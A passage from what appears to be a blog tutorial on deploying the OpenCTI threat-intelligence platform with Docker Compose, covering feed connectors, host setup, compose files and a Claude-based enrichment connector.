src="https://cdn-images-1.medium.com/max/1024/1*_jOEvP3job4uFFPBnXLIkA.png"></figure><ul><li>Full ATT&amp;CK Enterprise / Mobile / ICS matrices</li><li>Heatmaps of technique usage per threat actor or campaign</li><li>Gap analysis against your current detection coverage</li></ul><h4>2.4 Threat Actor Profiling</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*N98FeMPaxF2ZYnhLF8kEGQ.png"></figure><ul><li>Attributed aliases, motivations (financial, espionage, hacktivism)</li><li>Geo and sector targeting mapped on world map</li><li>Timeline of campaigns and malware usage</li></ul><h4>2.5 Automation &amp; Playbooks</h4><ul><li>Built-in playbook engine (since v5.9): trigger enrichment, notifications, or SOAR actions on entity creation/modification(<strong>Enterprise Edition only)</strong></li><li>Python SDK for custom automation</li><li>Webhook support for external integrations</li></ul><h4>2.6 Collaboration &amp; Sharing</h4><ul><li>Role-based access control (RBAC) with groups and organizations</li><li>TLP (Traffic Light Protocol) enforcement at object level</li><li>TAXII 2.1 server — push feeds to SIEMs, firewalls, EDR platforms</li><li>Sharing with partner organizations via federated instances</li></ul><h4>2.7 Dashboard &amp; Reporting</h4><ul><li>Customizable dashboards with widget library</li><li>PDF report generation</li><li>Timeline, matrix, and entity views</li><li>Attack path visualization</li></ul><h3>3. Architecture Overview</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xAFxmmcNnaHdD8ZDbXIbDw.png"></figure><h3>4. Threat Intelligence Feeds</h3><h4>4.1 Free / Open-Source Feeds</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zamxLo7VEhjGX0cOnZvRJQ.png"></figure><ul><li><a href="https://attack.mitre.org/?utm_source=chatgpt.com"><strong>MITRE ATT&amp;CK</strong></a> — Connector: opencti/connector-mitre — Data: Techniques, mitigations, groups, software — Setup: API key not needed.</li><li><a href="https://nvd.nist.gov/?utm_source=chatgpt.com"><strong>CVE / NVD</strong></a> — Connector: opencti/connector-cve — Data: Vulnerabilities — Setup: <a href="https://nvd.nist.gov/developers/request-an-api-key">NVD API key</a> recommended/required depending on configuration.</li><li><a href="https://otx.alienvault.com/?utm_source=chatgpt.com"><strong>AlienVault OTX</strong></a> — Connector: opencti/connector-alienvault — Data: IOCs, pulses, malware families — Setup: Free OTX account/API key.</li><li><a href="https://bazaar.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch MalwareBazaar</strong></a> — Connector: opencti/connector-malwarebazaar — Data: Malware hashes, malware metadata, file observables — Setup: Free MalwareBazaar API key.</li><li><a href="https://urlhaus.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch URLhaus</strong></a> — Connector: opencti/connector-urlhaus — Data: Malicious URLs — Setup: Public feed; no API key for CSV feed.</li><li><a href="https://feodotracker.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch Feodo Tracker</strong></a> — Connector: use <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> or ingest the Feodo CSV/blocklist feed manually — Data: Botnet C2 IPs — Setup: Free.</li><li><a href="https://internetdb.shodan.io/"><strong>Shodan InternetDB</strong></a> — Connector: opencti/connector-shodan-internetdb — Data: IP enrichment, domains, CPEs, CVEs, tags — Setup: No API key required.</li><li><a href="https://www.misp-project.org/feeds/?utm_source=chatgpt.com"><strong>MISP Default / CIRCL OSINT Feeds</strong></a> — Connector: <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> — Data: STIX/MISP bundles, indicators, observables — Setup: Free.</li><li><a href="https://www.misp-project.org/feeds/?utm_source=chatgpt.com"><strong>CyberCrime-Tracker feed via MISP default feeds</strong></a> — Connector: use <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> rather than a dedicated current connector — Data: C2 panels / freetext indicators — Setup: Free.</li><li><a href="https://openphish.com/?utm_source=chatgpt.com"><strong>OpenPhish</strong></a> — Connector: no verified current dedicated OpenCTI connector in the main repo; use generic feed ingestion where suitable — Data: Phishing URLs — Setup: Free/community feed options.</li><li><strong>DigitalSide IT-ISAC MISP Feed</strong> — Connector: <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> with custom MISP_FEED_URL — Data: IOCs / MISP-format feed — Setup: Free.</li></ul><h4>4.2 Commercial Feeds (require license/API key)</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dMgCc4cuy0X9LxEAcR0PiQ.png"></figure><ul><li><a href="https://www.misp-project.org/"><strong>MISP — self-hosted</strong></a> — Connector: opencti/connector-misp — Strengths: community sharing, custom events, internal/private CTI exchange. The OpenCTI repo lists both misp and misp-feed; use misp for a live MISP instance with API access, and misp-feed for static MISP feed URLs.</li><li><a href="https://www.virustotal.com/"><strong>VirusTotal / Google Threat Intelligence</strong></a> — Connector: opencti/connector-virustotal — Strengths: file, URL, domain, and IP enrichment. The connector is under internal-enrichment, not external-import.</li><li><strong>Mandiant Threat Intelligence / Google Threat Intelligence</strong> — Connector: opencti/connector-mandiant — Strengths: APT intelligence, actor reporting, malware/campaign context.</li><li><a href="https://www.recordedfuture.com/"><strong>Recorded Future</strong></a> — Connectors: opencti/connector-recordedfuture and opencti/connector-recordedfuture-enrichment — Strengths: risk lists, enrichment, vulnerability/contextual intelligence, dark web and external threat data. Recorded Future documentation describes the OpenCTI integration as two components: an enrichment connector and a Recorded Future connector.</li><li><a href="https://www.crowdstrike.com/products/threat-intelligence/"><strong>CrowdStrike Falcon Intelligence</strong></a> — Connector: opencti/connector-crowdstrike — Strengths: actor tracking, indicators, adversary intelligence, Falcon ecosystem context.</li><li><a href="https://www.sekoia.io/"><strong>Sekoia.io Intelligence</strong></a> — Connector: opencti/connector-sekoia — Strengths: European threat landscape, CTI feed ingestion, actor/campaign context. Sekoia’s own documentation points to the OpenCTI GitHub connector path.</li><li><a href="https://threatconnect.com/"><strong>ThreatConnect</strong></a> — Connector: <strong>no verified current dedicated connector in the main OpenCTI connector tree</strong> — Strengths: enterprise TI management, source aggregation, workflow and case management. I found an OpenCTI GitHub label/feature reference for “threat connect,” but not a confirmed current connector folder equivalent to external-import/threatconnect.</li><li><a href="https://intel471.com/"><strong>Intel 471</strong></a> — Connectors: opencti/connector-intel471, opencti/connector-intel471-darknet, and opencti/connector-intel471_v2 — Strengths: underground forums, cybercrime actors, malware, infrastructure, dark web intelligence.</li></ul><h4>4.3 ISAC / Government Feeds</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dtrgjORW-h5AoEi0rOMBHw.png"></figure><ul><li><a href="https://www.cisa.gov/resources-tools/services/automated-indicator-sharing-ais-service?utm_source=chatgpt.com"><strong>CISA Automated Indicator Sharing / AIS</strong></a> — Method: TAXII/STIX client, AIS 2.0 uses TAXII 2.1 — Access: free service for eligible participants; contact CISA to onboard.</li><li><a href="https://www.fsisac.com/?utm_source=chatgpt.com"><strong>FS-ISAC</strong></a> — Method: STIX/TAXII and MISP automated feeds — Access: financial-sector membership; automated-feed credentials/licensing must be explicitly requested.</li><li><a href="https://health-isac.org/"><strong>Health-ISAC / H-ISAC</strong></a> — Method: HITS indicator-sharing feed; STIX/TAXII-compatible threat intelligence sharing — Access: healthcare-sector membership / Health-ISAC member access.</li><li><a href="https://www.misp-project.org/communities/?utm_source=chatgpt.com"><strong>NATO MISP Community</strong></a> — Method: MISP community / MISP sync — Access: official government cyber-defense entities from NATO nations, sponsored by their national representative in the NATO Multinational MISP Steering Board.</li><li><a href="https://www.enisa.europa.eu/topics/cyber-threats/threat-landscape?utm_source=chatgpt.com"><strong>ENISA Threat Landscape</strong></a> — Method: public reports and CTI publications; not a confirmed public TAXII/STIX feed. ENISA’s CTL methodology references STIX 2.1 as a common CTI representation format, but this is different from offering a public feed endpoint.</li></ul><h4>4.4 Feed Priority and TLP Assignment</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XhNw0PBdOVuwb9zHT37S5Q.png"></figure><pre># Recommended TLP assignment by source<br>feeds:<br>  - source: mitre_attack<br>    tlp: WHITE          # public, shareable<br>    confidence: 90<br>  - source: alienvault_otx<br>    tlp: GREEN          # community sharing<br>    confidence: 60<br>  - source: mandiant<br>    tlp: AMBER          # restricted to org<br>    confidence: 85<br>  - source: internal_soc<br>    tlp: RED            # internal only<br>    confidence: 95</pre><h3>5. AI Integration Layer</h3><p>This is the “AI-driven” layer on top of standard OpenCTI — a custom connector and MCP server that adds:</p><h4>5.1 AI Enrichment Connector (Claude API)</h4><ul><li>On every new Report, Malware, or Threat-Actor ingested → call Claude API</li><li>Extract structured STIX entities from unstructured text (PDFs, blog posts)</li><li>Summarize long reports into 3-sentence executive briefs</li><li>Score indicator relevance against your organization’s sector profile</li><li>Suggest ATT&amp;CK technique mappings from narrative descriptions</li></ul><h4>5.2 AI Pipeline Architecture</h4><pre>New Report ingested<br>        │<br>        ▼<br>[AI Enrichment Connector]<br>        │<br>        ├─► Claude API: Extract entities → creates STIX SDOs<br>        ├─► Claude API: Map to ATT&amp;CK techniques<br>        ├─► Claude API: Generate executive summary<br>        └─► Claude API: Score severity for your sector<br>                │<br>                ▼<br>        Update Report in OpenCTI<br>        (summary, related entities, confidence scores)</pre><h3>6. Prerequisites</h3><h4>6.1 Hardware (minimum production)</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ics48TK_7nXqH-diy8Uzng.png"></figure><h4>6.2 Software</h4><pre># Install Docker Engine (Ubuntu 22.04)<br>sudo apt-get update<br>sudo apt-get install -y ca-certificates curl gnupg lsb-release<br>sudo install -m 0755 -d /etc/apt/keyrings<br>curl -fsSL https://download.docker.com/linux/ubuntu/gpg | \<br>  sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg<br>sudo chmod a+r /etc/apt/keyrings/docker.gpg<br>echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] \<br>  https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | \<br>  sudo tee /etc/apt/sources.list.d/docker.list &gt; /dev/null<br>sudo apt-get update<br>sudo apt-get install -y docker-ce docker-ce-cli containerd.io docker-compose-plugin<br># Add user to docker group<br>sudo usermod -aG docker $USER<br>newgrp docker<br># Verify<br>docker compose version</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/1*eM3O8rdQsyvwxf-0WEZX8w.png"></figure><h4>6.3 System Tuning (required for ElasticSearch)</h4><pre># ElasticSearch requires high vm.max_map_count<br>sudo sysctl -w vm.max_map_count=1048575<br>echo "vm.max_map_count=1048575" | sudo tee -a /etc/sysctl.conf<br><br># Increase file descriptor limits<br>echo "* soft nofile 65536" | sudo tee -a /etc/security/limits.conf<br>echo "* hard nofile 65536" | sudo tee -a /etc/security/limits.conf</pre><h3>7. Docker Compose Deployment</h3><h4><strong>7.0 Deploy from GitHub (recommended)</strong></h4><p>The fastest deployment path is to clone the maintained project repository and create a local `.env` from the sanitized template:</p><pre>cd /home/andrey<br>git clone https://github.com/anpa1200/opencti-intelligent-shield.git openCTI<br>cd /home/andrey/openCTI<br># Create local secrets/config. This file is ignored by Git.<br>cp .env.example .env<br>nano .env<br># Start the full stack after filling in .env<br>./scripts/start-all.sh</pre><p>This gives you the Docker Compose files, OpenCTI patches, AI enrichment connector, helper scripts, and Docusaurus documentation in one checkout. Use the manual sections below if you want to recreate the files by hand or compare the generated content.</p><h4>7.1 Directory Structure</h4><pre>/home/andrey/openCTI/<br>├── .env                          # secrets and config<br>├── docker-compose.yml            # core stack<br>├── docker-compose.connectors.yml # feed connectors<br>├── docker-compose.ai.yml         # AI enrichment connector<br>├── patches/<br>│   └── back.js                   # ILM race condition fix (ES 8.13 + OpenCTI 6.2.0)<br>└── connectors/<br>    └── ai-enrichment/            # custom AI connector source</pre><h4>7.2 Environment File</h4><pre>cat &gt; /home/andrey/openCTI/.env &lt;&lt; 'EOF'<br># === Core ===<br>OPENCTI_ADMIN_EMAIL=admin@opencti.local<br>OPENCTI_ADMIN_PASSWORD=CHANGE_ME_STRONG_PASSWORD<br>OPENCTI_ADMIN_TOKEN=CHANGE_ME_UUID4_TOKEN<br>OPENCTI_BASE_URL=http://localhost:8080<br><br># === Secrets ===<br>APP__ADMIN__TOKEN=CHANGE_ME_UUID4_TOKEN<br>APP__SECRET_KEY=CHANGE_ME_SECRET<br><br># === ElasticSearch ===<br># NOTE: key is ELASTIC_PASSWORD, not ELASTIC_AUTH<br>ELASTIC_PASSWORD=CHANGE_ME_ELASTIC_PASS<br><br># === Redis ===<br>REDIS_PASSWORD=opencti<br><br># === MinIO ===<br>MINIO_ROOT_USER=opencti<br>MINIO_ROOT_PASSWORD=CHANGE_ME_MINIO_PASS<br><br># === RabbitMQ ===<br>RABBITMQ_DEFAULT_USER=opencti<br>RABBITMQ_DEFAULT_PASS=CHANGE_ME_RABBITMQ_PASS<br><br># === Connector IDs (unique UUID4 per connector — NOT used for auth) ===<br>CONNECTOR_MITRE_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_CVE_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_ALIENVAULT_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_ABUSE_SSL_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_URLHAUS_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_AI_ENRICHMENT_TOKEN=CHANGE_ME_UUID4<br><br># === External API keys ===<br>ALIENVAULT_API_KEY=your_otx_key_here<br>NVD_API_KEY=your_nvd_api_key_here     # UUID format from nvd.nist.gov/developers/request-an-api-key<br>ANTHROPIC_API_KEY=your_claude_api_key_here<br>EOF<br><br># Generate unique UUIDs for connector IDs<br>python3 -c "import uuid; [print(uuid.uuid4()) for _ in range(8)]"# Generate proper tokens<br>python3 -c "import uuid; [print(f'Token: {uuid.uuid4()}') for _ in range(10)]"</pre><h4>7.3 Core Stack — docker-compose.yml</h4><pre>nano docker-compose.yml</pre><pre>version: "3"<br>services:<br>  redis:<br>    image: redis:7.2<br>    restart: always<br>    volumes:<br>      - redisdata:/data<br>    command: redis-server --requirepass ${REDIS_PASSWORD:-opencti}<br>  elasticsearch:<br>    image: docker.elastic.co/elasticsearch/elasticsearch:8.13.0<br>    volumes:<br>      - esdata:/usr/share/elasticsearch/data<br>    environment:<br>      - discovery.type=single-node<br>      - xpack.ml.enabled=false<br>      - xpack.security.enabled=true<br>      - ELASTIC_PASSWORD=${ELASTIC_PASSWORD:-CHANGE_ME}<br>      - "ES_JAVA_OPTS=-Xms2g -Xmx2g"<br>      - cluster.routing.allocation.disk.threshold_enabled=false<br>    ulimits:<br>      memlock:<br>        soft: -1<br>        hard: -1<br>    restart: always<br>  minio:<br>    image: minio/minio:RELEASE.2024-01-16T16-07-38Z<br>    volumes:<br>      - miniodata:/data<br>    ports:<br>      - "9001:9001"   # console<br>    environment:<br>      MINIO_ROOT_USER: ${MINIO_ROOT_USER:-opencti}<br>      MINIO_ROOT_PASSWORD: ${MINIO_ROOT_PASSWORD:-CHANGE_ME}<br>    command: server /data --console-address ":9001"<br>    restart: always<br>  rabbitmq:<br>    image: rabbitmq:3.13-management<br>    environment:<br>      RABBITMQ_DEFAULT_USER: ${RABBITMQ_DEFAULT_USER:-opencti}<br>      RABBITMQ_DEFAULT_PASS: ${RABBITMQ_DEFAULT_PASS:-CHANGE_ME}<br>      RABBITMQ_NODENAME: rabbit01@localhost<br>    volumes:<br>      - rabbitmqdata:/var/lib/rabbitmq<br>    restart: always<br>  opencti:<br>    image: opencti/platform:6.2.0<br>    environment:<br>      NODE_OPTIONS: --max-old-space-size=8096<br>      APP__PORT: 8080<br>      APP__BASE_URL: ${OPENCTI_BASE_URL:-http://localhost:8080}<br>      APP__ADMIN__EMAIL: ${OPENCTI_ADMIN_EMAIL}<br>      APP__ADMIN__PASSWORD: ${OPENCTI_ADMIN_PASSWORD}<br>      APP__ADMIN__TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      APP__APP_LOGS__LOGS_LEVEL: error<br>      REDIS__HOSTNAME: redis<br>      REDIS__PORT: 6379<br>      REDIS__USE_SSL: "false"<br>      REDIS__PASSWORD: ${REDIS_PASSWORD:-opencti}<br>      ELASTICSEARCH__URL: http://elasticsearch:9200<br>      ELASTICSEARCH__USERNAME: elastic<br>      ELASTICSEARCH__PASSWORD: ${ELASTIC_PASSWORD:-CHANGE_ME}<br>      MINIO__ENDPOINT: minio<br>      MINIO__PORT: 9000<br>      MINIO__USE_SSL: "false"<br>      MINIO__ACCESS_KEY: ${MINIO_ROOT_USER:-opencti}<br>      MINIO__SECRET_KEY: ${MINIO_ROOT_PASSWORD:-CHANGE_ME}<br>      RABBITMQ__HOSTNAME: rabbitmq<br>      RABBITMQ__PORT: 5672<br>      RABBITMQ__USERNAME: ${RABBITMQ_DEFAULT_USER:-opencti}<br>      RABBITMQ__PASSWORD: ${RABBITMQ_DEFAULT_PASS:-CHANGE_ME}<br>      SMTP__HOSTNAME: localhost<br>      PROVIDERS__LOCAL__STRATEGY: LocalStrategy<br>    volumes:<br>      - ./patches/back.js:/opt/opencti/build/back.js:ro<br>    ports:<br>      - "8080:8080"<br>    depends_on:<br>      - redis<br>      - elasticsearch<br>      - minio<br>      - rabbitmq<br>    restart: always<br>  worker:<br>    image: opencti/worker:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      WORKER_LOG_LEVEL: error<br>    depends_on:<br>      - opencti<br>    deploy:<br>      mode: replicated<br>      replicas: 3<br>    restart: always<br>volumes:<br>  esdata:<br>  redisdata:<br>  miniodata:<br>  rabbitmqdata:<br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h4>7.4 Connectors — docker-compose.connectors.yml</h4><pre>nano docker-compose.connectors.yml</pre><pre>version: "3"<br>services:<br>  # MITRE ATT&amp;CK (no API key needed)<br>  connector-mitre:<br>    image: opencti/connector-mitre:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_MITRE_TOKEN}<br>      CONNECTOR_NAME: "MITRE ATT&amp;CK"<br>      CONNECTOR_SCOPE: "marking-definition,identity,attack-pattern,course-of-action,intrusion-set,campaign,malware,tool,vulnerability,x-mitre-matrix,x-mitre-tactic,x-mitre-collection"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_UPDATE_EXISTING_DATA: "true"<br>      CONNECTOR_LOG_LEVEL: error<br>      MITRE_REMOVE_STATEMENT_MARKING: "true"<br>      MITRE_INTERVAL: 7  # days between full refresh<br>    restart: always<br>  # CVE / NVD Vulnerabilities<br>  connector-cve:<br>    image: opencti/connector-cve:6.2.0<br>    volumes:<br>      - ./patches/cve/api.py:/opt/opencti-connector-cve/services/client/api.py:ro<br>      - ./patches/cve/vulnerability.py:/opt/opencti-connector-cve/services/client/vulnerability.py:ro<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_CVE_TOKEN}<br>      CONNECTOR_NAME: "Common Vulnerabilities and Exposures"<br>      CONNECTOR_SCOPE: "identity,vulnerability"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_LOG_LEVEL: info<br>      CONNECTOR_UPDATE_EXISTING_DATA: "true"<br>      CVE_BASE_URL: "https://services.nvd.nist.gov/rest/json/cves"<br>      CVE_API_KEY: ${NVD_API_KEY}<br>      CVE_MAX_DATE_RANGE: 120<br>      CVE_MAINTAIN_DATA: "true"<br>      CVE_INTERVAL: 2<br>    restart: always<br>  # AlienVault OTX<br>  connector-alienvault:<br>    image: opencti/connector-alienvault:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_ALIENVAULT_TOKEN}<br>      CONNECTOR_NAME: "AlienVault OTX"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      ALIENVAULT_BASE_URL: "https://otx.alienvault.com"<br>      ALIENVAULT_API_KEY: ${ALIENVAULT_API_KEY}<br>      ALIENVAULT_TLP: "White"<br>      ALIENVAULT_CREATE_OBSERVABLES: "true"<br>      ALIENVAULT_CREATE_INDICATORS: "true"<br>      ALIENVAULT_PULSE_START_TIMESTAMP: "2020-01-01T00:00:00"<br>      ALIENVAULT_REPORT_STATUS: "New"<br>      ALIENVAULT_REPORT_TYPE: "threat-report"<br>      ALIENVAULT_GUESS_MALWARE: "false"<br>      ALIENVAULT_GUESS_CVE: "false"<br>      ALIENVAULT_INTERVAL: 30   # minutes<br>    restart: always<br>  # Abuse.ch SSL Blacklist<br>  connector-abuse-ssl:<br>    image: opencti/connector-abuse-ssl:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_MALWAREBAZAAR_TOKEN}<br>      CONNECTOR_NAME: "Abuse.ch SSL Blacklist"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 50<br>      CONNECTOR_LOG_LEVEL: error<br>      ABUSE_SSL_URL: "https://sslbl.abuse.ch/blacklist/sslblacklist.csv"<br>      ABUSE_SSL_INTERVAL: 30  # minutes<br>    restart: always<br>  # Abuse.ch URLhaus<br>  connector-urlhaus:<br>    image: opencti/connector-urlhaus:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_URLHAUS_TOKEN}<br>      CONNECTOR_NAME: "Abuse.ch URLhaus"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      URLHAUS_CSV_URL: "https://urlhaus.abuse.ch/downloads/csv_recent/"<br>      URLHAUS_IMPORT_OFFLINE: "true"<br>      URLHAUS_INTERVAL: 2  # hours<br>    restart: always<br>  connector-threatfox:<br>    image: opencti/connector-threatfox:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_THREATFOX_TOKEN}<br>      CONNECTOR_NAME: "ThreatFox"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      THREATFOX_API_URL: "https://threatfox-api.abuse.ch/api/v1/"<br>      THREATFOX_CREATE_INDICATORS: "true"<br>      THREATFOX_CREATE_OBSERVABLES: "true"<br>      THREATFOX_INTERVAL: 3<br>    restart: always<br>  connector-import-document:<br>    image: opencti/connector-import-document:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_IMPORT_DOCUMENT_TOKEN}<br>      CONNECTOR_NAME: "ImportDocument"<br>      CONNECTOR_SCOPE: "application/pdf,text/plain,text/html"<br>      CONNECTOR_AUTO: "true"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_LOG_LEVEL: error<br>    restart: always<br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h4>7.5 AI Enrichment Connector — docker-compose.ai.yml</h4><pre>nano docker-compose.ai.yml</pre><pre>version: "3"<br><br>services:<br>  connector-ai-enrichment:<br>    build:<br>      context: ./connectors/ai-enrichment<br>      dockerfile: Dockerfile<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_AI_ENRICHMENT_TOKEN}<br>      CONNECTOR_NAME: "AI Enrichment (Claude)"<br>      CONNECTOR_LOG_LEVEL: info<br>      ANTHROPIC_API_KEY: ${ANTHROPIC_API_KEY}<br>      AI_MODEL: claude-opus-4-7<br>      AI_ENRICHMENT_REPORTS: "true"<br>      AI_ENRICHMENT_MALWARE: "true"<br>      AI_ENRICHMENT_THREAT_ACTORS: "true"<br>    restart: always<br><br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h3>8. Connector Configuration</h3><h4>Fast Start / Stop Scripts</h4><p>The repository includes two helper scripts for daily operations:</p><pre># Start core OpenCTI, wait for the UI/API, then start connectors and AI enrichment<br>./scripts/start-all.sh<br># Stop AI enrichment, connectors, and core OpenCTI while preserving Docker volumes<br>./scripts/stop-all.sh</pre><p>Use these scripts for normal start/stop operations after .env is configured. Use the manual commands below when debugging a specific service startup problem.</p><pre>nano start-all.sh</pre><pre>#!/usr/bin/env bash<br>set -euo pipefail<br><br>ROOT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." &amp;&amp; pwd)"<br>cd "$ROOT_DIR"<br><br>WAIT_TIMEOUT="${WAIT_TIMEOUT:-300}"<br><br>wait_for_opencti() {<br>  local deadline=$((SECONDS + WAIT_TIMEOUT))<br><br>  echo "[start] Waiting for OpenCTI API on http://localhost:8080..."<br>  until curl -fsS http://localhost:8080 &gt;/dev/null 2&gt;&amp;1; do<br>    if (( SECONDS &gt;= deadline )); then<br>      echo "[start] OpenCTI did not become reachable within ${WAIT_TIMEOUT}s." &gt;&amp;2<br>      echo "[start] Check logs with: docker compose logs -f opencti" &gt;&amp;2<br>      return 1<br>    fi<br>    sleep 5<br>  done<br>}<br><br>echo "[start] Starting OpenCTI core stack..."<br>docker compose -f docker-compose.yml up -d<br><br>wait_for_opencti<br><br>echo "[start] Starting external connectors..."<br>docker compose -f docker-compose.connectors.yml up -d<br><br>echo "[start] Building and starting AI enrichment connector..."<br>docker compose -f docker-compose.ai.yml up -d --build<br><br>echo "[start] Done."<br>docker compose -f docker-compose.yml ps</pre><pre>nano stop-all.sh</pre><pre>#!/usr/bin/env bash<br>set -euo pipefail<br><br>ROOT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." &amp;&amp; pwd)"<br>cd "$ROOT_DIR"<br><br>echo "[stop] Stopping OpenCTI core, connectors, and AI enrichment..."<br>docker compose \<br>  -f docker-compose.yml \<br>  -f docker-compose.connectors.yml \<br>  -f docker-compose.ai.yml \<br>  down --remove-orphans<br><br>echo "[stop] Done. Volumes are preserved."</pre><h4>8.1 Start the Core Stack</h4><pre>cd /home/andrey/openCTI<br><br># Pre-flight: ElasticSearch refuses allocation above 90% disk usage<br>df -h /var/lib/docker<br># If &gt; 90% full, run: docker system prune -a   (frees ~47 GB of unused images)<br><br># Create the shared Docker network (idempotent — safe to re-run)<br>docker network create opencti_network 2&gt;/dev/null || true<br><br># Start core services<br>docker compose -f docker-compose.yml up -d<br><br># Wait for ElasticSearch to be healthy before OpenCTI finishes initializing<br>until curl -s -u "elastic:${ELASTIC_PASSWORD}" \<br>  http://localhost:9200/_cluster/health | grep -q '"status":"green"\|"status":"yellow"'; do<br>  echo "Waiting for ES..."; sleep 5<br>done<br><br># Watch logs — first-run index creation takes 5-10 minutes<br># Look for "Listening on port 8080"<br>docker compose -f docker-compose.yml logs -f opencti | grep -E "Listening|ERROR|indices"</pre><h4>8.2 Start Connectors</h4><pre># Start feed connectors (after OpenCTI is healthy)<br>docker compose -f docker-compose.connectors.yml up -d<br># Verify connectors registered (wait ~60s for startup)<br>docker compose -f docker-compose.connectors.yml ps</pre><h4>8.3 Verify in UI</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bgDghte5c5Hd2tKbutvP8A.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fIQLlAGqYjzNesmSnRw2QQ.png"></figure><pre>http://localhost:8080<br>Login: admin@opencti.local / &lt;your password&gt;Navigation:<br>  Data → Connectors → check all show status "connected"<br>  Knowledge → Malwares → should start populating within minutes<br>  Activities → Logs → watch ingest events</pre><h3>9. AI-Driven Enrichment Pipeline</h3><h4>Overview</h4><p>The AI enrichment pipeline adds a Claude-powered layer on top of the standard OpenCTI ingestion flow. Every time a connector (AlienVault, MITRE, URLhaus, etc.) writes a new object into OpenCTI, an event is published to RabbitMQ. The AI connector subscribes to that event stream, calls the Claude API with the object’s content, and writes the extracted structured intelligence back into the graph as STIX relationships, notes, and entity updates — all automatically.</p><p><strong>Without AI enrichment:</strong></p><pre>AlienVault pulse → Report object in OpenCTI<br>                   (raw text, no relationships, no ATT&amp;CK mapping)</pre><p><strong>With AI enrichment:</strong></p><pre>AlienVault pulse → Report object in OpenCTI<br>                       ↓ AI connector picks it up from event stream<br>                   Claude API: extract entities, map techniques, score severity<br>                       ↓<br>                   Report now has:<br>                   ├── Note: executive summary (2-3 sentences)<br>                   ├── Relationship → ThreatActor (if found in graph)<br>                   ├── Relationship → Malware (if found in graph)<br>                   ├── Relationship → AttackPattern T1059.001 (created if missing)<br>                   └── x_opencti_score updated based on AI confidence</pre><h4>9.1 How the Event Stream Works</h4><p>OpenCTI uses RabbitMQ as its internal message bus. Every write operation (create, update, delete) on any STIX object publishes a message to a topic exchange. Connectors subscribe to this exchange via pycti's OpenCTIConnectorHelper.listen() 